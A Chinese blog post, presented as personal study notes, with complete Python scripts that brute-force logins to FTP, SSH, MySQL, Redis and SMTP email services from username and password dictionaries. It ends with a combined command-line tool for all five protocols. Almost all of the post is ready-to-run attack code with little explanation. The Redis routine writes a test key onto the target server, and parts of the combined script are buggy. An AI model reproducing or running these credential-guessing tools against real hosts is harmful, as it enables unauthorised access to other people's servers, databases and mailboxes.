3、安全开发-Python-协议库爆破&FTP&SSH&Redis&MYSQL&SMTP等

用途:个人学习笔记,有所借鉴,欢迎指正!

目录

前言:

一、Python-文件传输爆破-ftplib库操作ftp协议

1、关键代码解释:

2、完整代码:

二、Python-登录爆破-paramiko库操作ssh协议

1、关键代码解释:

2、完整代码:

三、Python-数据库爆破-pymysqlj库操作mysql协议

1、关键代码解释:

2、完整代码:

四、Python-数据库爆破-redis库操作redist协议

1、关键代码解释:

2、完整代码:

五、Python-邮件爆破-smtplib库操作smtp协议

1、关键代码解释:

2、完整代码:

六、整合五种协议爆破完整脚本


前言:

原理:python的一些库支持FTP、SSH、Redis、SMTP、Mysql等协议远程登录,只需要知道该服务器ip和端口,然后用本机准备好的用户名字典和密码字典进行循环组合尝试爆破登录,其中字典的好坏决定成功的几率,可以尝试弱口令集和社工方式获取,当然也不一定能成功,这只是锄头,挖不挖的进取决于是什么地。

一、Python-文件传输爆破-ftplib库操作ftp协议

FTP服务默认端口:21

1、关键代码解释:

python 复制代码
from ftplib import FTP

ftp = FTP()
ftp.connect(ip, 21)  #连接ftp服务器ip和端口
ftp.login(username,password) #尝试用户名和密码远程登录

2、完整代码:

python 复制代码
from ftplib import FTP
import os

def ftp_check(ip,username,password):
    ftp = FTP()
    print('check->'+ip+'|'+username+'|'+password)
    try:
        ftp.connect(ip, 21)
        ftp.login(username,password)
        print('success')
        exit()
    except Exception as e:
        print('failed')

if __name__ == '__main__':
    pypath = os.getcwd()  #当前工作目录
    ip=input('please input ftp ip:')
    #注意修改自己字典的存放目录
    for username in open(pypath+'/dic/ftp_username.txt'):
        username=username.replace('\n','')
        for password in open(pypath+'/dic/ftp_password.txt'):
            password=password.replace('\n','')
            ftp_check(ip,username,password)

二、Python-登录爆破-paramiko库操作ssh协议

ssh服务默认端口:22

1、关键代码解释:

python 复制代码
import paramiko

#获取SSH客户端对象
ssh = paramiko.SSHClient()
# 允许连接不在know_hosts文件中的主机
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) 
#使用用户名和密码远程连接
ssh.connect(ip,"22",username,password)

2、完整代码:

python 复制代码
import paramiko,os

def ssh_check(ip,username,password):
    print('check->' + ip + '|' + username + '|' + password)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip,"22",username,password)
        print('success')
        exit()
    except Exception as e:
        print('failed')

if __name__ == '__main__':
    pypath = os.getcwd() #当前工作目录
    ip = input('please input ssh ip:')
    #注意修改自己字典的存放目录
    for username in open(pypath + '/dic/ssh_username.txt'):
        username = username.replace('\n', '')
        for password in open(pypath + '/dic/ssh_password.txt'):
            password = password.replace('\n', '')
            ssh_check(ip,username,password)

三、Python-数据库爆破-pymysqlj库操作mysql协议

mysql服务默认端口:3306

1、关键代码解释:

python 复制代码
import pymysql
 #远程连接Myql服务
conn_obj = pymysql.connect( 
            host=ip,  # MySQL服务端的IP地址
            port=3306,  # MySQL默认PORT地址(端口号)
            user=username,  # 用户名
            password=password,  # 密码,也可以简写为passwd
            database='mysql',  # 库名称,也可以简写为db
            charset='utf8'  # 字符编码
        )

2、完整代码:

python 复制代码
import pymysql,os

def mysql_check(ip,username,password):
    print('check->' + ip + '|' + username + '|' + password)
    try:
        conn_obj = pymysql.connect(
            host=ip,  
            port=3306, 
            user=username, 
            password=password, 
            database='mysql',
            charset='utf8'
        )
        print('success')
        exit()
    except Exception as e:
        pass

if __name__ == '__main__':
    pypath = os.getcwd() #当前工作目录
    ip = input('please input ssh ip:')
    #注意修改自己字典的存放目录
    for username in open(pypath + '/dic/mysql_username.txt'):
        username = username.replace('\n', '')
        for password in open(pypath + '/dic/mysql_password.txt'):
            password = password.replace('\n', '')
            mysql_check(ip,username,password)

四、Python-数据库爆破-redis库操作redist协议

redis服务默认端口:6379,远程登录不需要账号,只要密码

1、关键代码解释:

python 复制代码
import redis

#远程连接redis服务
redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
redis_conn.set('test', 'laowang') #存入键,测试密码是否正确,若错误则存入失败报错

2、完整代码:

python 复制代码
import redis,os

def redis_check(ip,password):
    print('check->' + ip + '|' + password)
    try:
        redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
        redis_conn.set('test', 'laowang')
        print('success')
        exit()
    except Exception as e:
        pass

if __name__ == '__main__':
    pypath = os.getcwd() #当前工作目录
    ip = input('please input ssh ip:')
    #注意修改字典所在目录
    for password in open(pypath + '/dic/redis_password.txt'):
        password = password.replace('\n', '')
        redis_check(ip, password)

五、Python-邮件爆破-smtplib库操作smtp协议

smtp服务默认端口:25

1、关键代码解释:

python 复制代码
import smtplib
#获取smtp客户端对象
smtpObj = smtplib.SMTP()
#远程连接SMTP服务, 25 为 SMTP 端口号
smtpObj.connect('smtp.'+ip, 25)
#用户名和密码尝试登录
smtpObj.login(username, password)

2、完整代码:

python 复制代码
import smtplib,os

def email_check(ip,username,password):
    print('check->' + ip + '|' +username+'|'+ password)
    try:
        smtpObj = smtplib.SMTP()
        smtpObj.connect('smtp.'+ip, 25) 
        smtpObj.login(username, password)
        print('ok')
        exit()
    except smtplib.SMTPException:
        print("Error")

if __name__ == '__main__':
    pypath = os.getcwd() #当前工作目录
    #注意修改字典所在目录
    for username in open(pypath + '/dic/email_username.txt'):
        username = username.replace('\n', '')
        ip=username.split('@')[1]
        for password in open(pypath + '/dic/email_password.txt'):
            password = password.replace('\n', '')
            email_check(ip, username, password)

六、整合五种协议爆破完整脚本

from ftplib import FTP
import paramiko
import pymysql
import redis
import smtplib
import os,sys

def ftp_check(ip,username,password):
    ftp = FTP()
    print('check->'+ip+'|'+username+'|'+password)
    try:
        ftp.connect(ip, 21)
        ftp.login(username,password)
        print('success')
        exit()
    except Exception as e:
        print('failed')

def ssh_check(ip,username,password):
    print('check->' + ip + '|' + username + '|' + password)
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(ip,"22",username,password)
        print('success')
        exit()
    except Exception as e:
        print('failed')

def mysql_check(ip,username,password):
    print('check->' + ip + '|' + username + '|' + password)
    try:
        conn_obj = pymysql.connect(
            host=ip,  # MySQL服务端的IP地址
            port=3306,  # MySQL默认PORT地址(端口号)
            user=username,  # 用户名
            password=password,  # 密码,也可以简写为passwd
            database='mysql',  # 库名称,也可以简写为db
            charset='utf8'  # 字符编码
        )
        print('success')
        exit()
    except Exception as e:
        pass

def redis_check(ip,password):
    print('check->' + ip + '|' + password)
    try:
        redis_conn = redis.Redis(host=ip, port=6379, password=password, db=0)
        redis_conn.set('test', 'xiaodi')
        print('success')
        exit()
    except Exception as e:
        pass

def email_check(ip,username,password):
    print('check->' + ip + '|' +username+'|'+ password)
    try:
        smtpObj = smtplib.SMTP()
        smtpObj.connect('smtp.'+ip, 25)  # 25 为 SMTP 端口号
        smtpObj.login(username, password)
        print('ok')
        exit()
    except smtplib.SMTPException:
        print("Error")

if __name__ == '__main__':
    pypath = os.getcwd()
    print('eg:固定字典使用说明:')
    print('python all.py ftp 127.0.0.1')
    print('python all.py ssh 127.0.0.1')
    print('python all.py redis 127.0.0.1')
    print('python all.py mysql 127.0.0.1')
    print('python all.py email')
    print('eg:自定义字典使用说明:')
    print('python all.py ftp 127.0.0.1 user.txt pass.txt')
    print('python all.py ssh 127.0.0.1 user.txt pass.txt')
    print('python all.py redis 127.0.0.1 user.txt pass.txt')
    print('python all.py mysql 127.0.0.1 user.txt pass.txt')
    print('python all.py email user.txt pass.txt')
    xy=sys.argv[1]
    ip=sys.argv[2]
    zidian = sys.argv[3]
    zidian2=sys.argv[4]

    #没有设置自定义字典,采用固定字典
    if len(zidian)==0:
        if xy=='ftp':
            for username in open(pypath + '/conf/dic_username_ftp.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ftp.txt'):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        elif xy=='ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy=='mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy=='redis':
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy=='email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)
    #设置了自定义字典,自定义字典爆破(代码只修改的ftp)
    else:
        if xy=='ftp':
            for username in open(pypath +'\\'+ zidian):
                username = username.replace('\n', '')
                for password in open(pypath +'\\'+ zidian2):
                    password = password.replace('\n', '')
                    ftp_check(ip, username, password)
        elif xy=='ssh':
            for username in open(pypath + '/conf/dic_username_ssh.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_ssh.txt'):
                    password = password.replace('\n', '')
                    ssh_check(ip, username, password)
        elif xy=='mysql':
            for username in open(pypath + '/conf/dic_username_mysql.txt'):
                username = username.replace('\n', '')
                for password in open(pypath + '/conf/dic_password_mysql.txt'):
                    password = password.replace('\n', '')
                    mysql_check(ip, username, password)
        elif xy=='redis':
            for password in open(pypath + '/conf/dic_password_redis.txt'):
                password = password.replace('\n', '')
                redis_check(ip, password)
        elif xy=='email':
            for username in open(pypath + '/conf/dic_username_email.txt'):
                username = username.replace('\n', '')
                ip = username.split('@')[1]
                for password in open(pypath + '/conf/dic_password_email.txt'):
                    password = password.replace('\n', '')
                    email_check(ip, username, password)
相关推荐
Dlwyz11 分钟前
redis-击穿、穿透、雪崩
数据库·redis·缓存
网易独家音乐人Mike Zhou2 小时前
【卡尔曼滤波】数据预测Prediction观测器的理论推导及应用 C语言、Python实现(Kalman Filter)
c语言·python·单片机·物联网·算法·嵌入式·iot
安静读书2 小时前
Python解析视频FPS(帧率)、分辨率信息
python·opencv·音视频
工业甲酰苯胺2 小时前
Redis性能优化的18招
数据库·redis·性能优化
小二·3 小时前
java基础面试题笔记(基础篇)
java·笔记·python
i道i4 小时前
MySQL win安装 和 pymysql使用示例
数据库·mysql
小喵要摸鱼5 小时前
Python 神经网络项目常用语法
python
Oak Zhang5 小时前
sharding-jdbc自定义分片算法,表对应关系存储在mysql中,缓存到redis或者本地
redis·mysql·缓存
门牙咬脆骨6 小时前
【Redis】redis缓存击穿,缓存雪崩,缓存穿透
数据库·redis·缓存
门牙咬脆骨6 小时前
【Redis】GEO数据结构
数据库·redis·缓存